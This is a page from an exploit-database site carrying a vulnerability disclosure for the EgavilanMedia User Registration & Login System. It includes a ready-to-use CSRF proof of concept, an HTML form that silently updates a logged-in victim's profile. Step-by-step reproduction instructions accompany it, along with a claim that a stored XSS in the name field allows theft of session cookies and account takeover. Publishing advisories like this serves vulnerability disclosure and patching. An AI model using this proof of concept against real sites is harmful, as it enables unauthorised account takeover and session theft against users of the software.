0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EgavilanMedia User Registration & Login System with Admin Panel - CSRF Vulnerability
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel - CSRF # Exploit Author: Hardik Solanki # Vendor Homepage: http://egavilanmedia.com # Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php # Version: 1.0 # Tested on Windows 10 CSRF ATTACK: Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same-origin policy, which is designed to prevent different websites from interfering with each other. Attack Vector: An attacker can update any user's account. (Note: FULL NAME field is also vulnerable to stored XSS & attacker can steal the authenticated Session os the user) Steps to reproduce: 1. Open user login page using the following URL: -> http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html 2. Now login with the "attacker" user account & navigate to the edit profile tab. Click on the "Update" button and intercept the request in web proxy tool called "Burpusite" 3. Generate the CSRF POC from the burp tool. Copy the URL or Copy the below code. <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action=" http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php" method="POST"> <input type="hidden" name="fullname" value="Attacker" /> <input type="hidden" name="username" value="hunterr" /> <input type="hidden" name="email" value="noooobhunter@gmail.com" /> <input type="hidden" name="gender" value="Male" /> <input type="hidden" name="action" value="update_user" /> <input type="submit" value="Submit request" /> </form> </body> </html> 4. Now, login with the "Victim/Normal user" account. (Let that user is currently authenticated in the browser). 5. Paste the URL in the browser, which is copied in step 3. OR submit the CSRF POC code, which is shown in step 3. 6. We receive a "Status: Success", which indicates that the CSRF attack is successfully done & the Attacker can takeover the user account via Stored XSS (Steal the authenticated Cookies of the user from the "FULL NAME" parameter) IMPACT: An attacker can takeover any user account. (Note: FULL NAME field is also vulnerable to stored XSS & attacker can steal the authenticated Session os the user) # 0day.today [2024-07-05] #